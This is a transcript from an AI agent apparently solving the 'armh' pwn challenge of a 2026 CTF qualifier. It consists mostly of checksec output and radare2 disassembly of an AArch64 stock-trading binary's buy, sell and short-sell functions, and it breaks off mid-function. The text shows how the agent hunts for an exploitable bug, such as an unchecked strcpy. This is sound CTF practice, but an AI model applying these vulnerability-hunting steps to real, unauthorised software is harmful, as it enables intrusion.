# Thread Handoff

- Thread: calm-vector-2977
- UUID: ce602d5a-22e0-4b7e-b021-92d6146aee47
- CTF: midnight-sun-ctf-2026-quals
- Challenge: armh
- Runtime: codex
- Model: gpt-5.5
- Status: completed

## Transcript

- **Assistant:** I’ll start by inventorying `/challenge` and identifying the challenge type. I’ll also send concise progress notes to the provided webhook when there are concrete findings or failed approaches.
- **Assistant:** The bundle is a pwn-style distribution: an AArch64 ELF plus matching loader/libc. I’m checking the binary properties and first-pass symbols/strings now.
- **Assistant:**

  ```
  [*] '/challenge/armh-dist/armh'
      Arch:     aarch64-64-little
      RELRO:    No RELRO
      Stack:    Canary found
      NX:       NX enabled
      PIE:      PIE enabled
      Stripped: No
  ```
- **Assistant:** The binary is not stripped, so the named functions are enough to guide static analysis. I’m going function-by-function now to find the money/portfolio bug before trying the remote service.
- **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero.
Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1d8c(x) ┌ 480: sym.sell_stock (int64_t arg_60h); │ `- args() vars(13:sp[0x8..0x5c]) │ 0x000013ac ff8301d1 sub sp, sp, 0x60 │ 0x000013b0 fd7b05a9 stp x29, x30, [var_50h] │ 0x000013b4 fd430191 add x29, sp, 0x50 │ 0x000013b8 800000b0 adrp x0, 0x12000 │ 0x000013bc 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000013c0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000013c4 e12700f9 str x1, [var_48h] │ 0x000013c8 010080d2 mov x1, 0 │ 0x000013cc ffff01a9 stp xzr, xzr, [var_18h] │ 0x000013d0 ffff02a9 stp xzr, xzr, [var_28h] │ 0x000013d4 ffff03a9 stp xzr, xzr, [var_38h] │ 0x000013d8 ff0700b9 str wzr, [var_4h] │ 0x000013dc e1130091 add x1, sp, 4 ; int64_t arg2 │ 0x000013e0 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000013e4 54feff97 bl sym.get_symbol_quantity │ 0x000013e8 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000013ec 32ffff97 bl sym.find_user_stock │ 0x000013f0 e00b00b9 str w0, [var_4h] │ 0x000013f4 e00b40b9 ldr w0, [var_4h] │ 0x000013f8 1f040031 cmn w0, 1 │ ┌─< 0x000013fc 61000054 b.ne 0x1408 │ │ 0x00001400 00008012 mov w0, -1 │ ┌──< 0x00001404 55000014 b 0x1558 │ ││ ; CODE XREF from sym.sell_stock @ 0x13fc(x) │ │└─> 0x00001408 800000f0 adrp x0, 0x14000 │ │ 0x0000140c 01600491 add x1, x0, 0x118 ; 0x14118 │ │ ; obj.user_stocks │ │ 0x00001410 e00b80b9 ldrsw x0, [var_4h] │ │ 0x00001414 00e47ad3 lsl x0, x0, 6 │ │ 0x00001418 2000008b add x0, x1, x0 ; 0x14118 │ │ ; obj.user_stocks │ │ 0x0000141c 013840b9 ldr w1, [x0, 0x38] │ │ 0x00001420 e00740b9 ldr w0, [var_4h] │ │ 0x00001424 3f00006b cmp w1, w0 │ │┌─< 0x00001428 62000054 b.hs 0x1434 │ ││ 0x0000142c 20008012 mov w0, -2 │ ┌───< 0x00001430 4a000014 b 0x1558 │ │││ ; CODE XREF from sym.sell_stock @ 0x1428(x) │ ││└─> 0x00001434 e0630091 add x0, sp, 0x18 ; int64_t arg1 │ ││ 0x00001438 ddfeff97 bl sym.find_stock │ ││ 0x0000143c e00f00b9 str w0, [format] │ ││ 0x00001440 e00f40b9 ldr w0, [format] │ ││ 0x00001444 1f040031 
cmn w0, 1 │ ││┌─< 0x00001448 61000054 b.ne 0x1454 │ │││ 0x0000144c 00008012 mov w0, -1 │ ┌────< 0x00001450 42000014 b 0x1558 │ ││││ ; CODE XREF from sym.sell_stock @ 0x1448(x) │ │││└─> 0x00001454 800000b0 adrp x0, 0x12000 │ │││ 0x00001458 01602091 add x1, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x0000145c e00f80b9 ldrsw x0, [format] │ │││ 0x00001460 00e47ad3 lsl x0, x0, 6 │ │││ 0x00001464 2000008b add x0, x1, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x00001468 001840fd ldr d0, [x0, 0x30] │ │││ 0x0000146c 00000090 adrp x0, 0x1000 │ │││ 0x00001470 00c03b91 add x0, x0, 0xef0 ; 0x1ef0 ; "Selling at $%.2f\n" ; const char *format │ │││ 0x00001474 8bfdff97 bl sym.imp.printf ; int printf(const char *format) │ │││ 0x00001478 800000f0 adrp x0, 0x14000 │ │││ 0x0000147c 01600491 add x1, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001480 e00b80b9 ldrsw x0, [var_4h] │ │││ 0x00001484 00e47ad3 lsl x0, x0, 6 │ │││ 0x00001488 2000008b add x0, x1, x0 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x0000148c 001840fd ldr d0, [x0, 0x30] │ │││ 0x00001490 00000090 adrp x0, 0x1000 │ │││ 0x00001494 00203c91 add x0, x0, 0xf08 ; 0x1f08 ; "Purchased at $%.2f\n" ; const char *format │ │││ 0x00001498 82fdff97 bl sym.imp.printf ; int printf(const char *format) │ │││ 0x0000149c 800000b0 adrp x0, 0x12000 │ │││ 0x000014a0 01602091 add x1, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014a4 e00f80b9 ldrsw x0, [format] │ │││ 0x000014a8 00e47ad3 lsl x0, x0, 6 │ │││ 0x000014ac 2000008b add x0, x1, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014b0 011840fd ldr d1, [x0, 0x30] │ │││ 0x000014b4 e00740b9 ldr w0, [var_4h] │ │││ 0x000014b8 0000631e ucvtf d0, w0 │ │││ 0x000014bc 2008601e fmul d0, d1, d0 │ │││ 0x000014c0 e00b00fd str d0, [var_10h] │ │││ 0x000014c4 800000b0 adrp x0, 0x12000 │ │││ 0x000014c8 00202091 add x0, x0, 0x808 ; 0x12808 │ │││ ; obj.money │ │││ 0x000014cc 010040fd ldr d1, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ │││ 0x000014d0 e00b40fd ldr d0, [var_10h] │ │││ 0x000014d4 
2028601e fadd d0, d1, d0 │ │││ 0x000014d8 800000b0 adrp x0, 0x12000 │ │││ 0x000014dc 00202091 add x0, x0, 0x808 ; 0x12808 │ │││ ; obj.money │ │││ 0x000014e0 000000fd str d0, [x0] ; 0x12808 │ │││ ; obj.money │ │││ 0x000014e4 800000b0 adrp x0, 0x12000 │ │││ 0x000014e8 01602091 add x1, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014ec e00f80b9 ldrsw x0, [format] │ │││ 0x000014f0 00e47ad3 lsl x0, x0, 6 │ │││ 0x000014f4 2000008b add x0, x1, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x000014f8 013840b9 ldr w1, [x0, 0x38] │ │││ 0x000014fc e00740b9 ldr w0, [var_4h] │ │││ 0x00001500 2100000b add w1, w1, w0 │ │││ 0x00001504 800000b0 adrp x0, 0x12000 │ │││ 0x00001508 02602091 add x2, x0, 0x818 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x0000150c e00f80b9 ldrsw x0, [format] │ │││ 0x00001510 00e47ad3 lsl x0, x0, 6 │ │││ 0x00001514 4000008b add x0, x2, x0 ; 0x12818 │ │││ ; obj.stocks │ │││ 0x00001518 013800b9 str w1, [x0, 0x38] │ │││ 0x0000151c 800000f0 adrp x0, 0x14000 │ │││ 0x00001520 01600491 add x1, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001524 e00b80b9 ldrsw x0, [var_4h] │ │││ 0x00001528 00e47ad3 lsl x0, x0, 6 │ │││ 0x0000152c 2000008b add x0, x1, x0 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001530 013840b9 ldr w1, [x0, 0x38] │ │││ 0x00001534 e00740b9 ldr w0, [var_4h] │ │││ 0x00001538 2100004b sub w1, w1, w0 │ │││ 0x0000153c 800000f0 adrp x0, 0x14000 │ │││ 0x00001540 02600491 add x2, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001544 e00b80b9 ldrsw x0, [var_4h] │ │││ 0x00001548 00e47ad3 lsl x0, x0, 6 │ │││ 0x0000154c 4000008b add x0, x2, x0 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x00001550 013800b9 str w1, [x0, 0x38] │ │││ 0x00001554 00008052 mov w0, 0 │ │││ ; CODE XREFS from sym.sell_stock @ 0x1404(x), 0x1430(x), 0x1450(x) │ └└└──> 0x00001558 e103002a mov w1, w0 │ 0x0000155c 800000b0 adrp x0, 0x12000 │ 0x00001560 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001564 e32740f9 ldr x3, [var_48h] │ 0x00001568 020040f9 ldr 
x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000156c 630002eb subs x3, x3, x2 │ 0x00001570 020080d2 mov x2, 0 │ ┌─< 0x00001574 40000054 b.eq 0x157c │ │ 0x00001578 26fdff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.sell_stock @ 0x1574(x) │ └─> 0x0000157c e003012a mov w0, w1 │ 0x00001580 fd7b45a9 ldp x29, x30, [var_50h] │ 0x00001584 ff830191 add sp, sp, 0x60 ; 0x178000 └ 0x00001588 c0035fd6 ret ; CALL XREF from main @ 0x1d60(x) ┌ 532: sym.buy_stock (int64_t arg_60h); │ `- args() vars(13:sp[0x8..0x5c]) │ 0x00001198 ff8301d1 sub sp, sp, 0x60 │ 0x0000119c fd7b05a9 stp x29, x30, [var_50h] │ 0x000011a0 fd430191 add x29, sp, 0x50 │ 0x000011a4 800000b0 adrp x0, 0x12000 │ 0x000011a8 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000011ac 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000011b0 e12700f9 str x1, [var_48h] │ 0x000011b4 010080d2 mov x1, 0 │ 0x000011b8 ffff01a9 stp xzr, xzr, [src] │ 0x000011bc ffff02a9 stp xzr, xzr, [var_28h] │ 0x000011c0 ffff03a9 stp xzr, xzr, [var_38h] │ 0x000011c4 ff0700b9 str wzr, [var_4h] │ 0x000011c8 e1130091 add x1, sp, 4 ; int64_t arg2 │ 0x000011cc e0630091 add x0, sp, 0x18 ; int64_t arg1 │ 0x000011d0 d9feff97 bl sym.get_symbol_quantity │ 0x000011d4 e0630091 add x0, sp, 0x18 ; char *arg1 │ 0x000011d8 75ffff97 bl sym.find_stock │ 0x000011dc e00b00b9 str w0, [var_4h] │ 0x000011e0 e00b40b9 ldr w0, [var_4h] │ 0x000011e4 e00f00b9 str w0, [var_ch] │ 0x000011e8 e00b40b9 ldr w0, [var_4h] │ 0x000011ec 1f040031 cmn w0, 1 │ ┌─< 0x000011f0 61000054 b.ne 0x11fc │ │ 0x000011f4 00008012 mov w0, -1 │ ┌──< 0x000011f8 60000014 b 0x1378 │ ││ ; CODE XREF from sym.buy_stock @ 0x11f0(x) │ │└─> 0x000011fc 800000b0 adrp x0, 0x12000 │ │ 0x00001200 01602091 add x1, x0, 0x818 ; 0x12818 │ │ ; obj.stocks │ │ 0x00001204 e00b80b9 ldrsw x0, [var_4h] │ │ 0x00001208 00e47ad3 lsl x0, x0, 6 │ │ 0x0000120c 2000008b add x0, x1, x0 ; 0x12818 │ │ ; obj.stocks │ │ 0x00001210 
011840fd ldr d1, [x0, 0x30] │ │ 0x00001214 e00740b9 ldr w0, [var_4h] │ │ 0x00001218 0000631e ucvtf d0, w0 │ │ 0x0000121c 2008601e fmul d0, d1, d0 │ │ 0x00001220 e00b00fd str d0, [var_10h] │ │ 0x00001224 800000b0 adrp x0, 0x12000 │ │ 0x00001228 00202091 add x0, x0, 0x808 ; 0x12808 │ │ ; obj.money │ │ 0x0000122c 000040fd ldr d0, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ │ 0x00001230 e10b40fd ldr d1, [var_10h] │ │ 0x00001234 3020601e fcmpe d1, d0 │ │┌─< 0x00001238 4c000054 b.gt 0x1240 │ ┌───< 0x0000123c 03000014 b 0x1248 │ │││ ; CODE XREF from sym.buy_stock @ 0x1238(x) │ ││└─> 0x00001240 20008012 mov w0, -2 │ ││┌─< 0x00001244 4d000014 b 0x1378 │ │││ ; CODE XREF from sym.buy_stock @ 0x123c(x) │ └───> 0x00001248 800000b0 adrp x0, 0x12000 │ ││ 0x0000124c 00202091 add x0, x0, 0x808 ; 0x12808 │ ││ ; obj.money │ ││ 0x00001250 010040fd ldr d1, [x0] ; [0x12808:8]=0x40c3880000000000 ; obj.money │ ││ 0x00001254 e00b40fd ldr d0, [var_10h] │ ││ 0x00001258 2038601e fsub d0, d1, d0 │ ││ 0x0000125c 800000b0 adrp x0, 0x12000 │ ││ 0x00001260 00202091 add x0, x0, 0x808 ; 0x12808 │ ││ ; obj.money │ ││ 0x00001264 000000fd str d0, [x0] ; 0x12808 │ ││ ; obj.money │ ││ 0x00001268 e0630091 add x0, sp, 0x18 ; char *arg1 │ ││ 0x0000126c 92ffff97 bl sym.find_user_stock │ ││ 0x00001270 e00b00b9 str w0, [var_4h] │ ││ 0x00001274 e00b40b9 ldr w0, [var_4h] │ ││ 0x00001278 1f040031 cmn w0, 1 │ ┌───< 0x0000127c c1020054 b.ne 0x12d4 │ │││ 0x00001280 a0000090 adrp x0, 0x15000 │ │││ 0x00001284 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x00001288 000040b9 ldr w0, [x0] ; [0x15a1c:8]=0 │ │││ ; obj.num_user_stocks │ │││ 0x0000128c e003002a mov w0, w0 │ │││ 0x00001290 01e47ad3 lsl x1, x0, 6 │ │││ 0x00001294 800000f0 adrp x0, 0x14000 │ │││ 0x00001298 00600491 add x0, x0, 0x118 ; 0x14118 │ │││ ; obj.user_stocks │ │││ 0x0000129c 2000008b add x0, x1, x0 ; 0x14118 │ │││ ; obj.user_stocks ; char *dest │ │││ 0x000012a0 e1630091 add x1, sp, 0x18 ; const char *src │ │││ 
0x000012a4 f3fdff97 bl sym.imp.strcpy ; char *strcpy(char *dest, const char *src) │ │││ 0x000012a8 a0000090 adrp x0, 0x15000 │ │││ 0x000012ac 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x000012b0 000040b9 ldr w0, [x0] ; [0x15a1c:8]=0 │ │││ ; obj.num_user_stocks │ │││ 0x000012b4 e00b00b9 str w0, [var_4h] │ │││ 0x000012b8 a0000090 adrp x0, 0x15000 │ │││ 0x000012bc 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x000012c0 000040b9 ldr w0, [x0] ; [0x15a1c:8]=0 │ │││ ; obj.num_user_stocks │ │││ 0x000012c4 01040011 add w1, w0, 1 │ │││ 0x000012c8 a0000090 adrp x0, 0x15000 │ │││ 0x000012cc 00702891 add x0, x0, 0xa1c ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ 0x000012d0 010000b9 str w1, [x0] ; 0x15a1c │ │││ ; obj.num_user_stocks │ │││ ; CODE XREF from sym.buy_stock @ 0x127c(x) │ └───> 0x000012d4 800000f0 adrp x0, 0x14000 │ ││ 0x000012d8 01600491 add x1, x0, 0x118 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x000012dc e00b80b9 ldrsw x0, [var_4h] │ ││ 0x000012e0 00e47ad3 lsl x0, x0, 6 │ ││ 0x000012e4 2000008b add x0, x1, x0 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x000012e8 013840b9 ldr w1, [x0, 0x38] │ ││ 0x000012ec e00740b9 ldr w0, [var_4h] │ ││ 0x000012f0 2100000b add w1, w1, w0 │ ││ 0x000012f4 800000f0 adrp x0, 0x14000 │ ││ 0x000012f8 02600491 add x2, x0, 0x118 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x000012fc e00b80b9 ldrsw x0, [var_4h] │ ││ 0x00001300 00e47ad3 lsl x0, x0, 6 │ ││ 0x00001304 4000008b add x0, x2, x0 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x00001308 013800b9 str w1, [x0, 0x38] │ ││ 0x0000130c 800000b0 adrp x0, 0x12000 │ ││ 0x00001310 01602091 add x1, x0, 0x818 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001314 e00f80b9 ldrsw x0, [var_ch] │ ││ 0x00001318 00e47ad3 lsl x0, x0, 6 │ ││ 0x0000131c 2000008b add x0, x1, x0 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001320 013840b9 ldr w1, [x0, 0x38] │ ││ 0x00001324 e00740b9 ldr w0, [var_4h] │ ││ 0x00001328 2100004b sub w1, w1, w0 │ ││ 0x0000132c 800000b0 adrp x0, 0x12000 │ ││ 
0x00001330 02602091 add x2, x0, 0x818 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001334 e00f80b9 ldrsw x0, [var_ch] │ ││ 0x00001338 00e47ad3 lsl x0, x0, 6 │ ││ 0x0000133c 4000008b add x0, x2, x0 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001340 013800b9 str w1, [x0, 0x38] │ ││ 0x00001344 800000b0 adrp x0, 0x12000 │ ││ 0x00001348 01602091 add x1, x0, 0x818 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x0000134c e00f80b9 ldrsw x0, [var_ch] │ ││ 0x00001350 00e47ad3 lsl x0, x0, 6 │ ││ 0x00001354 2000008b add x0, x1, x0 ; 0x12818 │ ││ ; obj.stocks │ ││ 0x00001358 001840fd ldr d0, [x0, 0x30] │ ││ 0x0000135c 800000f0 adrp x0, 0x14000 │ ││ 0x00001360 01600491 add x1, x0, 0x118 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x00001364 e00b80b9 ldrsw x0, [var_4h] │ ││ 0x00001368 00e47ad3 lsl x0, x0, 6 │ ││ 0x0000136c 2000008b add x0, x1, x0 ; 0x14118 │ ││ ; obj.user_stocks │ ││ 0x00001370 001800fd str d0, [x0, 0x30] │ ││ 0x00001374 00008052 mov w0, 0 │ ││ ; CODE XREFS from sym.buy_stock @ 0x11f8(x), 0x1244(x) │ └└─> 0x00001378 e103002a mov w1, w0 │ 0x0000137c 800000b0 adrp x0, 0x12000 │ 0x00001380 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x00001384 e32740f9 ldr x3, [var_48h] │ 0x00001388 020040f9 ldr x2, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x0000138c 630002eb subs x3, x3, x2 │ 0x00001390 020080d2 mov x2, 0 │ ┌─< 0x00001394 40000054 b.eq 0x139c │ │ 0x00001398 9efdff97 bl sym.imp.__stack_chk_fail ; void stack_chk_fail(void) │ │ ; CODE XREF from sym.buy_stock @ 0x1394(x) │ └─> 0x0000139c e003012a mov w0, w1 │ 0x000013a0 fd7b45a9 ldp x29, x30, [var_50h] │ 0x000013a4 ff830191 add sp, sp, 0x60 ; 0x178000 └ 0x000013a8 c0035fd6 ret - **Assistant:** INFO: Propagate noreturn information (aanr) INFO: Propagate noreturn information (aanr) INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. 
Use -B 0x800000 or aav0 INFO: Use -AA or aaaa to perform additional experimental analysis INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav) WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0 ; CALL XREF from main @ 0x1dc0(x) ┌ 540: sym.short_sell (int64_t arg_30h); │ `- args() vars(6:sp[0x8..0x24]) │ 0x0000158c ffc300d1 sub sp, sp, 0x30 │ 0x00001590 fd7b02a9 stp x29, x30, [var_20h] │ 0x00001594 fd830091 add x29, sp, 0x20 │ 0x00001598 800000b0 adrp x0, 0x12000 │ 0x0000159c 009c43f9 ldr x0, [x0, 0x738] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000015a0 010040f9 ldr x1, [x0] ; [0x15af8:8]=0 │ ; reloc.__stack_chk_guard │ 0x000015a4 e10f00f9 str x1, [var_18h] │ 0x000015a8 010080d2 mov x1, 0 │ 0x000015ac ff1300b9 str wzr, [var_10h] │ 0x000015b0 ff1700b9 str wzr, [var_10h] │ 0x000015b4 a0000090 adrp x0, 0x15000 │ 0x000015b8 00802891 add x0, x0, sym.imp.close ; 0xa20 │ 0x000015bc 000040fd ldr d0, [x0] ; [0x15a20:8]=0 │ ; obj.shorting_capacity │ 0x000015c0 200be8d2 mov x0, 0x4059000000000000 │ 0x000015c4 0100679e fmov d1, x0 │ 0x000015c8 1020611e fcmpe d0, d1 │ ┌─< 0x000015cc 44000054 b.mi 0x15d4 │ ┌──< 0x000015d0 06000014 b 0x15e8 │ ││ ; CODE XREF from sym.short_sell @ 0x15cc(x) │ │└─> 0x000015d4 00000090 adrp x0, 0x1000 │ │ 0x000015d8 00803c91 add x0, x0, 0xf20 ; 0x1f20 ; "You do not have sufficient funds to short." 
; const char *s │ │ 0x000015dc 1dfdff97 bl sym.imp.puts ; int puts(const char *s) │ │ 0x000015e0 00008012 mov w0, -1 │ │┌─< 0x000015e4 64000014 b 0x1774 │ ││ ; CODE XREF from sym.short_sell @ 0x15d0(x) │ └──> 0x000015e8 ff0f00b9 str wzr, [format] │ ┌──< 0x000015ec 1c000014 b 0x165c │ ││ ; CODE XREF from sym.short_sell @ 0x1664(x) │ ┌───> 0x000015f0 800000b0 adrp x0, 0x12000 │ ╎││ 0x000015f4 01602091 add x1, x0, 0x818 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x000015f8 e00f80b9 ldrsw x0, [format] │ ╎││ 0x000015fc 00e47ad3 lsl x0, x0, 6 │ ╎││ 0x00001600 2000008b add x0, x1, x0 ; 0x12818 │ ╎││ ; obj.stocks │ ╎││ 0x00001604 003840b9 ldr w0, [x0, 0x38] │ ╎││ 0x00001608 1f000071 cmp w0, 0 │ ┌────< 0x0000160c 20020054 b.eq 0x1650 │ │╎││ 0x00001610 e00f80b9 ldrsw x0, [format] │ │╎││ 0x00001614 01e47ad3 lsl x1, x0, 6 │ │╎││ 0x00001618 800000b0 adrp x0, 0x12000 │ │╎││ 0x0000161c 00602091 add x0, x0, 0x818 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001620 2200008b add x2, x1, x0 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001624 800000b0 adrp x0, 0x12000 │ │╎││ 0x00001628 01602091 add x1, x0, 0x818 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x0000162c e00f80b9 ldrsw x0, [format] │ │╎││ 0x00001630 00e47ad3 lsl x0, x0, 6 │ │╎││ 0x00001634 2000008b add x0, x1, x0 ; 0x12818 │ │╎││ ; obj.stocks │ │╎││ 0x00001638 003840b9 ldr w0, [x0, 0x38] │ │╎││ 0x0000163c e303002a mov w3, w0 │ │╎││ 0x00001640 e10f40b9 ldr w1, [format] │ │╎││ 0x00001644 00000090 adrp x0, 0x1000 │ │╎││ 0x00001648 00403d91 add x0, x0, 0xf50 ; 0x1f50 ; "%d. 
%s: %d shares\n" ; const char *format │ │╎││ 0x0000164c 15fdff97 bl sym.imp.printf ; int printf(const char *format) │ │╎││ ; CODE XREF from sym.short_sell @ 0x160c(x) │ └────> 0x00001650 e00f40b9 ldr w0, [format] │ ╎││ 0x00001654 00040011 add w0, w0, 1 │ ╎││ 0x00001658 e00f00b9 str w0, [format] │ ╎││ ; CODE XREF from sym.short_sell @ 0x15ec(x) │ ╎└──> 0x0000165c e00f40b9 ldr w0, [format] │ ╎ │ 0x00001660 1f8c0171 cmp w0, 0x63 ; 'c' │ └───< 0x00001664 6dfcff54 b.le 0x15f0 │ │ 0x00001668 00000090 adrp x0, 0x1000 │ │ 0x0000166c 00a03d91 add x0, x0, 0xf68 ; 0x1f68 ; "Stock to Short:" ; const char *format │ │ 0x00001670 0cfdff97 bl sym.imp.printf ; int printf(const char *format) │ │ 0x00001674 96fdff97 bl sym.read_int │ │ 0x00001678 e01300b9 str w0, [var_10h] │ │ 0x0000167c e01340b9 ldr w0, [var_10h] │ │ 0x00001680 1f900171 cmp w0, 0x64 ; 'd' │ ┌──< 0x00001684 cd000054 b.le 0x169c │ ││ 0x00001688 00000090 adrp x0, 0x1000 │ ││ 0x0000168c 00003e91 add x0, x0, 0xf80 ; 0x1f80 ; "No such stock" ; const char *s │ ││ 0x00001690 f0fcff97 bl sym.imp.puts ; int puts(const char *s) │ ││ 0x00001694 00008012 mov w0, -1 │ ┌───< 0x00001698 37000014 b 0x1774 │ │││ ; CODE XREF from sym.short_sell @ 0x1684(x) │ │└──> 0x0000169c 00000090 adrp x0, 0x1000 │ │ │ 0x000016a0 00c03a91 add x0, x0, 0xeb0 ; 0x1eb0 ; "Quantity:" ; const char *format │ │ │ 0x000016a4 fffcff97 bl sym.imp.printf ; int printf(const char *format) │ │ │ 0x000016a8 800000b0 adrp x0, 0x12000 │ │ │ 0x000016ac 01602091 add x1, x0, 0x818 ; 0x12818 │ │ │ ; obj.stocks │ │ │ 0x000016b0 e01380b9 ldrsw x0, [var_10h] │ │ │ 0x000016b4 00e47ad3 lsl x0, x0, 6 │ │ │ 0x000016b8 2000008b add x0, x1, x0 ; 0x12818 │ │ │ ; obj.stocks │ │ │ 0x000016bc 003840b9 ldr w0, [x0, 0x38] │ │ │ 0x000016c0 e11740b9 ldr w1, [var_10h] │ │ │ 0x000016c4 3f00006b cmp w1, w0 │ │┌──< 0x000016c8 c9000054 b.ls 0x16e0 │ │││ 0x000016cc 00000090 adrp x0, 0x1000 │ │││ 0x000016d0 00403e91 add x0, x0, 0xf90 ; 0x1f90 ; "No such quantity available" ; const char *s │ 
│││ 0x000016d4 dffcff97 bl sym.imp.puts ; int puts(const char *s) │ │││ 0x000016d8 00008012 mov w0, -1 │ ┌────< 0x000016dc 26000014 b 0x1774 │ ││││ ; CODE XREF from sym.short_sell @ 0x16c8(x) │ ││└──> 0x000016e0 7bfdff97 bl sym.read_int │ ││ │ 0x000016e4 e01700b9 str w0, [var_10h] │ ││ │ 0x000016e8 e01740b9 ldr w0, [var_10h] │ ││ │ 0x000016ec 0100631e ucvtf d1, w0 │ ││ │ 0x000016f0 800000b0 adrp x0, 0x12000 │ ││ │ 0x000016f4 01602091 add x1, x0, 0x818 ; 0x12818 │ ││ │ ; obj.stocks │ ││ │ 0x000016f8 e01380b9 ldrsw x0, [var_10h] │ ││ │ 0x000016fc 00e47ad3 lsl x0, x0, 6 │ ││ │ 0x00001700 2000008b add x0, x1, x0 ; 0x12818 │ ││ │ ; obj.stocks │ ││ │ 0x00001704 001840fd ldr d0, [x0, 0x30] │ ││ │ 0x00001708 2108601e fmul d1, d1, d0 │ ││ │ 0x0000170c a0000090 adrp x0, 0x15000 │ ││ │ 0x00001710 00802891 add x0, x0, sym.imp.close ; 0xa20 │ ││ │ 0x00001714 000040fd ldr d0, [x0] ; [0x15a20:8]=0 │ ││ │ ; obj.shorting_capacity │ ││ │ 0x00001718 3020601e fcmpe d1, d0 │ ││┌──< 0x0000171c 4c000054 b.gt 0x1724 │ ┌─────< 0x00001720 06000014 b 0x1738 │ │││││ ; CODE XREF from sym.short_sell @ 0x171c(x) │ │││└──> 0x00001724 00000090 adrp x0, 0x1000 │ │││ │ 0x00001728 00c03e91 add x0, x0, 0xfb0 ; 0x1fb0 ; "You are not allowed to short that much" ; const char *s │ │││ │ 0x0000172c c9fcff97 bl sym.imp.puts ; int puts(const char *s) │ │││ │ 0x00001730 00008012 mov w0, -1 │ │││┌──< 0x00001734 10000014 b 0x1774 │ │││││ ; CODE XREF from sym.short_sell @ 0x1720(x) │ └─────> 0x00001738 800000b0 adrp x0, 0x12000 │ ││││ 0x0000173c 01602091 add x1, x0, 0x818 ; 0x12818 │ ││││ ; obj.stocks │ ││││ 0x00001740 e01380b9 ldrsw x0, [var_10h] │ ││││ 0x00001744 00e47ad3 lsl x0, x0, 6 │ ││││ 0x00001748 2000008b add x0, x1, x0 ; 0x12818 │ ││││ ; obj.stocks │ ││││ 0x0000174c 013840b9 ldr w1, [x0, 0x38] │ ││││ 0x00001750 e01740b9 ldr w0, [var_10h] │ ││││ 0x00001754 2100004b sub w1, w1, w0 │ ││││ 0x00001758 800000b0 adrp x0, 0x12000 │ ││││ 0x0000175c 02602091 add x2, x0, 0x818 ; 0x12818 │ ││││ ; obj.stocks │
